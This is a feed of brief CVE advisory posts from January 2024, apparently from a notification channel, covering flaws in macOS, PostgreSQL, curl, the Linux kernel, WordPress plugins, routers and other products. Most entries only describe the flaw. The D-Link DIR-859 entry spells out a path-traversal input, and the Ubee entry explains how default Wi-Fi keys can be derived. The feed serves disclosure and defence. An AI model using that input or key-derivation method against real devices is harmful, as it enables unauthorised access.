🚨 CVE-2023-42887An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Ventura 13.6.4, macOS Sonoma 14.2. An app may be able to read arbitrary files.🎖@cveNotify |
|
| 2024-01-23 01:37:26 |
🚨 CVE-2023-42881The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2. Processing a file may lead to unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2024-01-23 01:37:25 |
🚨 CVE-2020-14498HMS Industrial Networks AB eCatcher all versions prior to 6.5.5 is vulnerable to a stack-based buffer overflow, which may allow an attacker to remotely execute arbitrary code.🎖@cveNotify |
|
| 2024-01-23 01:37:24 |
🚨 CVE-2018-10624In Johnson Controls Metasys System Versions 8.0 and prior and BCPro (BCM) all versions prior to 3.0.2, this vulnerability results from improper error handling in HTTP-based communications with the server, which could allow an attacker to obtain technical information.🎖@cveNotify |
|
| 2024-01-23 00:37:25 |
🚨 CVE-2024-23345Nautobot is a Network Source of Truth and Network Automation Platform built as a web application. All users of Nautobot versions earlier than 1.6.10 or 2.1.2 are potentially impacted by a cross-site scripting vulnerability. Due to inadequate input sanitization, any user-editable fields that support Markdown rendering, including are potentially susceptible to cross-site scripting (XSS) attacks via maliciously crafted data. This issue is fixed in Nautobot versions 1.6.10 and 2.1.2.🎖@cveNotify |
|
| 2024-01-23 00:37:24 |
🚨 CVE-2024-23342The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Versions 0.18.0 and prior are vulnerable to the Minerva attack. As of time of publication, no known patched version exists.🎖@cveNotify |
|
| 2024-01-22 23:37:25 |
🚨 CVE-2024-23340@hono/node-server is an adapter that allows users to run Hono applications on Node.js. Since v1.3.0, @hono/node-server has used its own Request object with `url` behavior that is unexpected. In the standard API, if the URL contains `..`, here called "double dots", the URL string returned by Request will be in the resolved path. However, the `url` in @hono/node-server's Request as does not resolve double dots, so `http://localhost/static/.. /foo.txt` is returned. This causes vulnerabilities when using `serveStatic`. Modern web browsers and a latest `curl` command resolve double dots on the client side, so this issue doesn't affect those using either of those tools. However, problems may occur if accessed by a client that does not resolve them. Version 1.4.1 includes the change to fix this issue. As a workaround, don't use `serveStatic`.🎖@cveNotify |
|
| 2024-01-22 23:37:24 |
🚨 CVE-2021-42141An issue was discovered in Contiki-NG tinyDTLS through 2018-08-30. One incorrect handshake could complete with different epoch numbers in the packets Client_Hello, Client_key_exchange, and Change_cipher_spec, which may cause denial of service.🎖@cveNotify |
|
| 2024-01-22 21:37:32 |
🚨 CVE-2023-43449An issue in HummerRisk HummerRisk v.1.10 thru 1.4.1 allows an authenticated attacker to execute arbitrary code via a crafted request to the service/LicenseService component.🎖@cveNotify |
|
| 2024-01-22 21:37:25 |
🚨 CVE-2023-5868A memory disclosure vulnerability was found in PostgreSQL that allows remote users to access sensitive information by exploiting certain aggregate function calls with 'unknown'-type arguments. Handling 'unknown'-type values from string literals without type designation can disclose bytes, potentially revealing notable and confidential information. This issue exists due to excessive data output in aggregate function calls, enabling remote users to read some portion of system memory.🎖@cveNotify |
|
| 2024-01-22 21:37:24 |
🚨 CVE-2023-39417IN THE EXTENSION SCRIPT, a SQL Injection vulnerability was found in PostgreSQL if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). If an administrator has installed files of a vulnerable, trusted, non-bundled extension, an attacker with database-level CREATE privilege can execute arbitrary code as the bootstrap superuser.🎖@cveNotify |
|
| 2024-01-22 21:07:32 |
🚨 CVE-2023-3372The Lana Shortcodes WordPress plugin before 1.2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which allows users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-01-22 21:07:25 |
🚨 CVE-2023-51810SQL injection vulnerability in StackIdeas EasyDiscuss v.5.0.5 and fixed in v.5.0.10 allows a remote attacker to obtain sensitive information via a crafted request to the search parameter in the Users module.🎖@cveNotify |
|
| 2024-01-22 21:07:24 |
🚨 CVE-2024-0543A vulnerability classified as critical has been found in CodeAstro Real Estate Management System up to 1.0. This affects an unknown part of the file propertydetail.php. The manipulation of the argument pid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250713 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-22 20:37:32 |
🚨 CVE-2023-46749Apache Shiro before 1.13.0 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default).🎖@cveNotify |
|
| 2024-01-22 20:37:25 |
🚨 CVE-2020-36770pkg_postinst in the Gentoo ebuild for Slurm through 22.05.3 unnecessarily calls chown to assign root's ownership on files in the live root filesystem. This could be exploited by the slurm user to become the owner of root-owned files.🎖@cveNotify |
|
| 2024-01-22 20:37:24 |
🚨 CVE-2023-46846SQUID is vulnerable to HTTP request smuggling, caused by chunked decoder lenience, allows a remote attacker to perform Request/Response smuggling past firewall and frontend security systems.🎖@cveNotify |
|
| 2024-01-22 20:07:32 |
🚨 CVE-2024-21654Rubygems.org is the Ruby community's gem hosting service. Rubygems.org users with MFA enabled would normally be protected from account takeover in the case of email account takeover. However, a workaround on the forgotten password form allows an attacker to bypass the MFA requirement and takeover the account. This vulnerability has been patched in commit 0b3272a.🎖@cveNotify |
|
| 2024-01-22 20:07:26 |
🚨 CVE-2023-49801Lif Auth Server is a server for validating logins, managing information, and account recovery for Lif Accounts. The issue relates to the `get_pfp` and `get_banner` routes on Auth Server. The issue is that there is no check to ensure that the file that Auth Server is receiving through these URLs is correct. This could allow an attacker access to files they shouldn't have access to. This issue has been patched in version 1.4.0.🎖@cveNotify |
|
| 2024-01-22 20:07:25 |
🚨 CVE-2023-28898The Real-Time Streaming Protocol implementation in the MIB3 infotainment incorrectly handles requests to /logs URI, when the id parameter equals to zero. This issue allows an attacker connected to the in-vehicle Wi-Fi network to cause denial-of-service of the infotainment system, when the certain preconditions are met.Vulnerability discovered on Škoda Superb III (3V3) - 2.0 TDI manufactured in 2022.🎖@cveNotify |
|
| 2024-01-22 20:07:24 |
🚨 CVE-2023-28897The secret value used for access to critical UDS services of the MIB3 infotainment is hardcoded in the firmware.Vulnerability discovered on Škoda Superb III (3V3) - 2.0 TDI manufactured in 2022.🎖@cveNotify |
|
| 2024-01-22 19:37:32 |
🚨 CVE-2024-21639CEF (Chromium Embedded Framework ) is a simple framework for embedding Chromium-based browsers in other applications. `CefLayeredWindowUpdaterOSR::OnAllocatedSharedMemory` does not check the size of the shared memory, which leads to out-of-bounds read outside the sandbox. This vulnerability was patched in commit 1f55d2e.🎖@cveNotify |
|
| 2024-01-22 19:37:26 |
🚨 CVE-2023-51750ScaleFusion 10.5.2 does not properly limit users to the Edge application because file downloads can occur. NOTE: the vendor's position is "Not vulnerable if the default Windows device profile configuration is used which utilizes modern management with website allow-listing rules."🎖@cveNotify |
|
| 2024-01-22 19:37:25 |
🚨 CVE-2023-38545This flaw makes curl overflow a heap based buffer in the SOCKS5 proxyhandshake.When curl is asked to pass along the host name to the SOCKS5 proxy to allowthat to resolve the address instead of it getting done by curl itself, themaximum length that host name can be is 255 bytes.If the host name is detected to be longer, curl switches to local nameresolving and instead passes on the resolved address only. Due to this bug,the local variable that means "let the host resolve the name" could get thewrong value during a slow SOCKS5 handshake, and contrary to the intention,copy the too long host name to the target buffer instead of copying just theresolved address there.The target buffer being a heap based buffer, and the host name coming from theURL that curl has been told to operate with.🎖@cveNotify |
|
| 2024-01-22 19:37:24 |
🚨 CVE-2023-38039When curl retrieves an HTTP response, it stores the incoming headers so thatthey can be accessed later via the libcurl headers API.However, curl did not have a limit in how many or how large headers it wouldaccept in a response, allowing a malicious server to stream an endless seriesof headers and eventually cause curl to run out of heap memory.🎖@cveNotify |
|
| 2024-01-22 19:07:25 |
🚨 CVE-2023-51751ScaleFusion 10.5.2 does not properly limit users to the Edge application because Alt-F4 can be used. This is fixed in 10.5.7 by preventing the launching of the file explorer in Agent-based Multi-App and Single App Kiosk mode.🎖@cveNotify |
|
| 2024-01-22 19:07:24 |
🚨 CVE-2023-41056Redis is an in-memory database that persists on disk. Redis incorrectly handles resizing of memory buffers which can result in integer overflow that leads to heap overflow and potential remote code execution. This issue has been patched in version 7.0.15 and 7.2.4.🎖@cveNotify |
|
| 2024-01-22 18:07:24 |
🚨 CVE-2023-49568A denial of service (DoS) vulnerability was discovered in go-git versions prior to v5.11. This vulnerability allows an attacker to perform denial of service attacks by providing specially crafted responses from a Git server which triggers resource exhaustion in go-git clients.Applications using only the in-memory filesystem supported by go-git are not affected by this vulnerability.This is a go-git implementation issue and does not affect the upstream git cli.🎖@cveNotify |
|
| 2024-01-22 17:37:24 |
🚨 CVE-2016-5002XML external entity (XXE) vulnerability in the Apache XML-RPC (aka ws-xmlrpc) library 3.1.3, as used in Apache Archiva, allows remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted DTD.🎖@cveNotify |
|
| 2024-01-22 17:07:25 |
🚨 CVE-2010-10011A vulnerability, which was classified as problematic, was found in Acritum Femitter Server 1.04. Affected is an unknown function. The manipulation leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250446 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-22 16:37:30 |
🚨 CVE-2024-0778** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in Uniview ISC 2500-S up to 20210930. Affected by this issue is the function setNatConfig of the file /Interface/DevManage/VM.php. The manipulation of the argument natAddress/natPort/natServerPort leads to os command injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251696. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-01-22 16:37:26 |
🚨 CVE-2022-4962A vulnerability was found in Apollo 2.0.0/2.0.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /users of the component Configuration Center. The manipulation leads to improper authorization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. VDB-250430 is the identifier assigned to this vulnerability. NOTE: The maintainer explains that user data information like user id, name, and email are not sensitive.🎖@cveNotify |
|
| 2024-01-22 16:37:25 |
🚨 CVE-2024-0454ELAN Match-on-Chip FPR solution has design fault about potential risk of valid SID leakage and enumeration with spoof sensor.This fault leads to that Windows Hello recognition would be bypass with cloning SID to cause broken account identity.Version which is lower than 3.0.12011.08009(Legacy)/3.3.12011.08103(ESS) would suffer this risk on DELL Inspiron platform.🎖@cveNotify |
|
| 2024-01-22 16:37:24 |
🚨 CVE-2023-51123An issue discovered in D-Link dir815 v.1.01SSb08.bin allows a remote attacker to execute arbitrary code via a crafted POST request to the service parameter in the soapcgi_main function of the cgibin binary component.🎖@cveNotify |
|
| 2024-01-22 16:07:30 |
🚨 CVE-2024-0522A vulnerability was found in Allegro RomPager 4.01. It has been classified as problematic. Affected is an unknown function of the file usertable.htm?action=delete of the component HTTP POST Request Handler. The manipulation of the argument username leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 4.30 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250692. NOTE: The vendor explains that this is a very old issue that got fixed 20 years ago but without a public disclosure.🎖@cveNotify |
|
| 2024-01-22 16:07:26 |
🚨 CVE-2023-52339In libebml before 1.4.5, an integer overflow in MemIOCallback.cpp can occur when reading or writing. It may result in buffer overflows.🎖@cveNotify |
|
| 2024-01-22 16:07:25 |
🚨 CVE-2019-9880An issue was discovered in the WPGraphQL 0.2.3 plugin for WordPress. By querying the 'users' RootQuery, it is possible, for an unauthenticated attacker, to retrieve all WordPress users details such as email address, role, and username.🎖@cveNotify |
|
| 2024-01-22 16:07:24 |
🚨 CVE-2019-9879The WPGraphQL 0.2.3 plugin for WordPress allows remote attackers to register a new user with admin privileges, whenever new user registrations are allowed. This is related to the registerUser mutation.🎖@cveNotify |
|
| 2024-01-22 15:07:26 |
🚨 CVE-2024-21673This High severity Remote Code Execution (RCE) vulnerability was introduced in versions 7.13.0 of Confluence Data Center and Server.Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.0 and a CVSS Vector of CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H allows an authenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, high impact to integrity, high impact to availability, and does not require user interaction.Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions:* Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release* Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release* Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher releaseSee the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives ).🎖@cveNotify |
|
| 2024-01-22 15:07:25 |
🚨 CVE-2021-3826Heap/stack buffer overflow in the dlang_lname function in d-demangle.c in libiberty allows attackers to potentially cause a denial of service (segmentation fault and crash) via a crafted mangled symbol.🎖@cveNotify |
|
| 2024-01-22 14:37:24 |
🚨 CVE-2023-49647Improper access control in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom SDKs for Windows before version 5.16.10 may allow an authenticated user to conduct an escalation of privilege via local access.🎖@cveNotify |
|
| 2024-01-22 14:07:37 |
🚨 CVE-2024-23730The OpenAPI and ChatGPT plugin loaders in LlamaHub (aka llama-hub) before 0.0.67 allow attackers to execute arbitrary code because safe_load is not used for YAML.🎖@cveNotify |
|
| 2024-01-22 14:07:31 |
🚨 CVE-2023-6531A use-after-free flaw was found in the Linux Kernel due to a race problem in the unix garbage collector's deletion of SKB races with unix_stream_read_generic() on the socket that the SKB is queued on.🎖@cveNotify |
|
| 2024-01-22 14:07:30 |
🚨 CVE-2024-23726Ubee DDW365 XCNDDW365 and DDW366 XCNDXW3WB devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. A remote attacker (in proximity to a Wi-Fi network) can derive the default WPA2-PSK value by observing a beacon frame. A PSK is generated by using the first six characters of the SSID and the last six of the BSSID, decrementing the last digit.🎖@cveNotify |
|
| 2024-01-22 14:07:29 |
🚨 CVE-2024-23725Ghost before 5.76.0 allows XSS via a post excerpt in excerpt.js. An XSS payload can be rendered in post summaries.🎖@cveNotify |
|
| 2024-01-22 14:07:26 |
🚨 CVE-2024-0521Code Injection in paddlepaddle/paddle🎖@cveNotify |
|
| 2024-01-22 14:07:25 |
🚨 CVE-2024-0623The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-01-22 14:07:24 |
🚨 CVE-2023-46447The POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE.🎖@cveNotify |
|
| 2024-01-22 13:37:25 |
🚨 CVE-2024-22233In Spring Framework versions 6.0.15 and 6.1.2, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.Specifically, an application is vulnerable when all of the following are true: * the application uses Spring MVC * Spring Security 6.1.6+ or 6.2.1+ is on the classpathTypically, Spring Boot applications need the org.springframework.boot:spring-boot-starter-web and org.springframework.boot:spring-boot-starter-security dependencies to meet all conditions.🎖@cveNotify |
|
| 2024-01-22 13:37:24 |
🚨 CVE-2024-0775A use-after-free flaw was found in the __ext4_remount in fs/ext4/super.c in ext4 in the Linux kernel. This flaw allows a local user to cause an information leak problem while freeing the old quota file names before a potential failure, leading to a use-after-free.🎖@cveNotify |
|
| 2024-01-22 11:37:25 |
🚨 CVE-2023-29052Users were able to define disclaimer texts for an upsell shop dialog that would contain script code that was not sanitized correctly. Attackers could lure victims to user accounts with malicious script code and make them execute it in the context of a trusted domain. We added sanitization for this content. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-22 11:37:24 |
🚨 CVE-2023-29051User-defined OXMF templates could be used to access a limited part of the internal OX App Suite Java API. The existing switch to disable the feature by default was not effective in this case. Unauthorized users could discover and modify application state, including objects related to other users and contexts. We now make sure that the switch to disable user-generated templates by default works as intended and will remove the feature in future generations of the product. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-22 06:37:25 |
🚨 CVE-2017-20189In Clojure before 1.9.0, classes can be used to construct a serialized object that executes arbitrary code upon deserialization. This is relevant if a server deserializes untrusted objects.🎖@cveNotify |
|
| 2024-01-22 06:37:24 |
🚨 CVE-2024-0647A vulnerability, which was classified as problematic, was found in Sparksuite SimpleMDE up to 1.11.2. This affects an unknown part of the component iFrame Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251373 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-22 05:37:25 |
🚨 CVE-2023-47352Technicolor TC8715D devices have predictable default WPA2 security passwords. An attacker who scans for SSID and BSSID values may be able to predict these passwords.🎖@cveNotify |
|
| 2024-01-22 05:37:24 |
🚨 CVE-2023-7042A null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service.🎖@cveNotify |
|
| 2024-01-22 04:37:25 |
🚨 CVE-2024-23771darkhttpd before 1.15 uses strcmp (which is not constant time) to verify authentication, which makes it easier for remote attackers to bypass authentication via a timing side channel.🎖@cveNotify |
|
| 2024-01-22 04:37:24 |
🚨 CVE-2024-23770darkhttpd through 1.15 allows local users to discover credentials (for --auth) by listing processes and their arguments.🎖@cveNotify |
|
| 2024-01-22 03:37:25 |
🚨 CVE-2024-0408A flaw was found in the X.Org server. The GLX PBuffer code does not call the XACE hook when creating the buffer, leaving it unlabeled. When the client issues another request to access that resource (as with a GetGeometry) or when it creates another resource that needs to access that buffer, such as a GC, the XSELINUX code will try to use an object that was never labeled and crash because the SID is NULL.🎖@cveNotify |
|
| 2024-01-22 03:37:24 |
🚨 CVE-2023-7042A null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service.🎖@cveNotify |
|
| 2024-01-22 01:37:24 |
🚨 CVE-2024-0774A vulnerability was found in Any-Capture Any Sound Recorder 2.93. It has been declared as problematic. This vulnerability affects unknown code of the component Registration Handler. The manipulation of the argument User Name/Key Code leads to memory corruption. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-251674 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-22 00:37:24 |
🚨 CVE-2024-0772A vulnerability was found in Nsasoft ShareAlarmPro 2.1.4 and classified as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-21 23:37:32 |
🚨 CVE-2024-23744An issue was discovered in Mbed TLS 3.5.1. There is persistent handshake denial if a client sends a TLS 1.3 ClientHello without extensions.🎖@cveNotify |
|
| 2024-01-21 23:37:25 |
🚨 CVE-2021-3563A flaw was found in openstack-keystone. Only the first 72 characters of an application secret are verified allowing attackers bypass some password complexity which administrators may be counting on. The highest threat from this vulnerability is to data confidentiality and integrity.🎖@cveNotify |
|
| 2024-01-21 23:37:24 |
🚨 CVE-2021-38155OpenStack Keystone 10.x through 16.x before 16.0.2, 17.x before 17.0.1, 18.x before 18.0.1, and 19.x before 19.0.1 allows information disclosure during account locking (related to PCI DSS features). By guessing the name of an account and failing to authenticate multiple times, any unauthenticated actor could both confirm the account exists and obtain that account's corresponding UUID, which might be leveraged for other unrelated attacks. All deployments enabling security_compliance.lockout_failure_attempts are affected.🎖@cveNotify |
|
| 2024-01-21 17:37:25 |
🚨 CVE-2024-23732The JSON loader in Embedchain before 0.1.57 allows a ReDoS (regular expression denial of service) via a long string to json.py.🎖@cveNotify |
|
| 2024-01-21 17:37:24 |
🚨 CVE-2024-23730The OpenAPI and ChatGPT plugin loaders in LlamaHub (aka llama-hub) before 0.0.67 allow attackers to execute arbitrary code because safe_load is not used for YAML.🎖@cveNotify |
|
| 2024-01-21 12:37:24 |
🚨 CVE-2024-0607A flaw was found in the Netfilter subsystem in the Linux kernel. The issue is in the nft_byteorder_eval() function, where the code iterates through a loop and writes to the `dst` array. On each iteration, 8 bytes are written, but `dst` is an array of u32, so each element only has space for 4 bytes. That means every iteration overwrites part of the previous element corrupting this array of u32. This flaw allows a local user to cause a denial of service or potentially break NetFilter functionality.🎖@cveNotify |
|
| 2024-01-21 11:37:24 |
🚨 CVE-2024-0607A flaw was found in the Netfilter subsystem in the Linux kernel. The issue is in the nft_byteorder_eval() function, where the code iterates through a loop and writes to the `dst` array. On each iteration, 8 bytes are written, but `dst` is an array of u32, so each element only has space for 4 bytes. That means every iteration overwrites part of the previous element corrupting this array of u32. This flaw allows a local user to cause a denial of service or potentially break NetFilter functionality.🎖@cveNotify |
|
| 2024-01-21 10:37:25 |
🚨 CVE-2023-6531A use-after-free flaw was found in the Linux Kernel due to a race problem in the unix garbage collector's deletion of SKB races with unix_stream_read_generic() on the socket that the SKB is queued on.🎖@cveNotify |
|
| 2024-01-21 10:37:24 |
🚨 CVE-2024-0584A use-after-free issue was found in igmp_start_timer in net/ipv4/igmp.c in the network sub-component in the Linux Kernel. This flaw allows a local user to observe a refcnt use-after-free issue when receiving an igmp query packet, leading to a kernel information leak.🎖@cveNotify |
|
| 2024-01-21 08:37:24 |
🚨 CVE-2024-0769** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DIR-859 1.06B01. It has been rated as critical. Affected by this issue is some unknown functionality of the file /hedwig.cgi of the component HTTP POST Request Handler. The manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251666 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-01-21 06:37:24 |
🚨 CVE-2016-15037A vulnerability, which was classified as problematic, has been found in go4rayyan Scumblr up to 2.0.1a. Affected by this issue is some unknown functionality of the component Task Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.2 is able to address this issue. The patch is identified as 5c9120f2362ddb7cbe48f2c4620715adddc4ee35. It is recommended to upgrade the affected component. VDB-251570 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-21 04:37:25 |
🚨 CVE-2024-23726Ubee DDW365 XCNDDW365 and DDW366 XCNDXW3WB devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. A remote attacker (in proximity to a Wi-Fi network) can derive the default WPA2-PSK value by observing a beacon frame. A PSK is generated by using the first six characters of the SSID and the last six of the BSSID, decrementing the last digit.🎖@cveNotify |
|
| 2024-01-21 04:37:24 |
🚨 CVE-2024-23725Ghost before 5.76.0 allows XSS via a post excerpt in excerpt.js. An XSS payload can be rendered in post summaries.🎖@cveNotify |
|
| 2024-01-21 03:37:25 |
🚨 CVE-2023-22665There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query.🎖@cveNotify |
|
| 2024-01-21 03:37:24 |
🚨 CVE-2023-27524Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.🎖@cveNotify |
|
| 2024-01-21 03:07:32 |
🚨 CVE-2012-3527view_help.php in the backend help system in TYPO3 4.5.x before 4.5.19, 4.6.x before 4.6.12 and 4.7.x before 4.7.4 allows remote authenticated backend users to unserialize arbitrary objects and possibly execute arbitrary PHP code via an unspecified parameter, related to a "missing signature (HMAC)."🎖@cveNotify |
|
| 2024-01-21 03:07:25 |
🚨 CVE-2008-7109The Scanner File Utility (aka listener) in Kyocera Mita (KM) 3.3.0.1 allows remote attackers to bypass authorization and upload arbitrary files to the client system via a modified program that does not prompt the user for a password.🎖@cveNotify |
|
| 2024-01-21 03:07:24 |
🚨 CVE-2008-4577The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.🎖@cveNotify |
|
| 2024-01-21 02:37:24 |
🚨 CVE-2021-39231In Apache Ozone versions prior to 1.2.0, Various internal server-to-server RPC endpoints are available for connections, making it possible for an attacker to download raw data from Datanode and Ozone manager and modify Ratis replication configuration.🎖@cveNotify |
|
| 2024-01-21 02:07:32 |
🚨 CVE-2023-4813A flaw was found in glibc. In an uncommon situation, the gaih_inet function may use memory that has been freed, resulting in an application crash. This issue is only exploitable when the getaddrinfo function is called and the hosts database in /etc/nsswitch.conf is configured with SUCCESS=continue or SUCCESS=merge.🎖@cveNotify |
|
| 2024-01-21 02:07:26 |
🚨 CVE-2022-1048A use-after-free flaw was found in the Linux kernel’s sound subsystem in the way a user triggers concurrent calls of PCM hw_params. The hw_free ioctls or similar race condition happens inside ALSA PCM for other ioctls. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-21 02:07:25 |
🚨 CVE-2006-2916artswrapper in aRts, when running setuid root on Linux 2.6.0 or later versions, does not check the return value of the setuid function call, which allows local users to gain root privileges by causing setuid to fail, which prevents artsd from dropping privileges.🎖@cveNotify |
|
| 2024-01-21 02:07:24 |
🚨 CVE-2002-1372Common Unix Printing System (CUPS) 1.1.14 through 1.1.17 does not properly check the return values of various file and socket operations, which could allow a remote attacker to cause a denial of service (resource exhaustion) by causing file descriptors to be assigned and not released, as demonstrated by fanta.🎖@cveNotify |
|
| 2024-01-21 01:37:32 |
🚨 CVE-2021-43675Lychee-v3 3.2.16 is affected by a Cross Site Scripting (XSS) vulnerability in php/Access/Guest.php. The function exit will terminate the script and print the message to the user. The message will contain albumID which is controlled by the user.🎖@cveNotify |
|
| 2024-01-21 01:37:25 |
🚨 CVE-2005-3274Race condition in ip_vs_conn_flush in Linux 2.6 before 2.6.13 and 2.4 before 2.4.32-pre2, when running on SMP systems, allows local users to cause a denial of service (null dereference) by causing a connection timer to expire while the connection table is being flushed before the appropriate lock is acquired.🎖@cveNotify |
|
| 2024-01-21 01:37:24 |
🚨 CVE-2003-1013The Q.931 dissector in Ethereal before 0.10.0, and Tethereal, allows remote attackers to cause a denial of service (crash) via a malformed Q.931, which triggers a null dereference.🎖@cveNotify |
|
| 2024-01-20 21:37:24 |
🚨 CVE-2024-0521Code Injection in paddlepaddle/paddle🎖@cveNotify |
|
| 2024-01-20 19:07:32 |
🚨 CVE-2024-22493A stored XSS vulnerability exists in JFinalcms 5.0.0 via the /gusetbook/save content parameter, which allows remote attackers to inject arbitrary web script or HTML.🎖@cveNotify |
|
| 2024-01-20 19:07:25 |
🚨 CVE-2022-48620uev (aka libuev) before 2.4.1 has a buffer overflow in epoll_wait if maxevents is a large number.🎖@cveNotify |
|
| 2024-01-20 19:07:24 |
🚨 CVE-2024-21669Hyperledger Aries Cloud Agent Python (ACA-Py) is a foundation for building decentralized identity applications and services running in non-mobile environments. When verifying W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDP-VCs), the result of verifying the presentation `document.proof` was not factored into the final `verified` value (`true`/`false`) on the presentation record. The flaw enables holders of W3C Format Verifiable Credentials using JSON-LD with Linked Data Proofs (LDPs) to present incorrectly constructed proofs, and allows malicious verifiers to save and replay a presentation from such holders as their own. This vulnerability has been present since version 0.7.0 and fixed in version 0.10.5.🎖@cveNotify |
|
| 2024-01-20 18:37:32 |
🚨 CVE-2024-20940Vulnerability in the Oracle Knowledge Management product of Oracle E-Business Suite (component: Create, Update, Authoring Flow). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Knowledge Management, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge Management accessible data as well as unauthorized read access to a subset of Oracle Knowledge Management accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2024-01-20 18:37:26 |
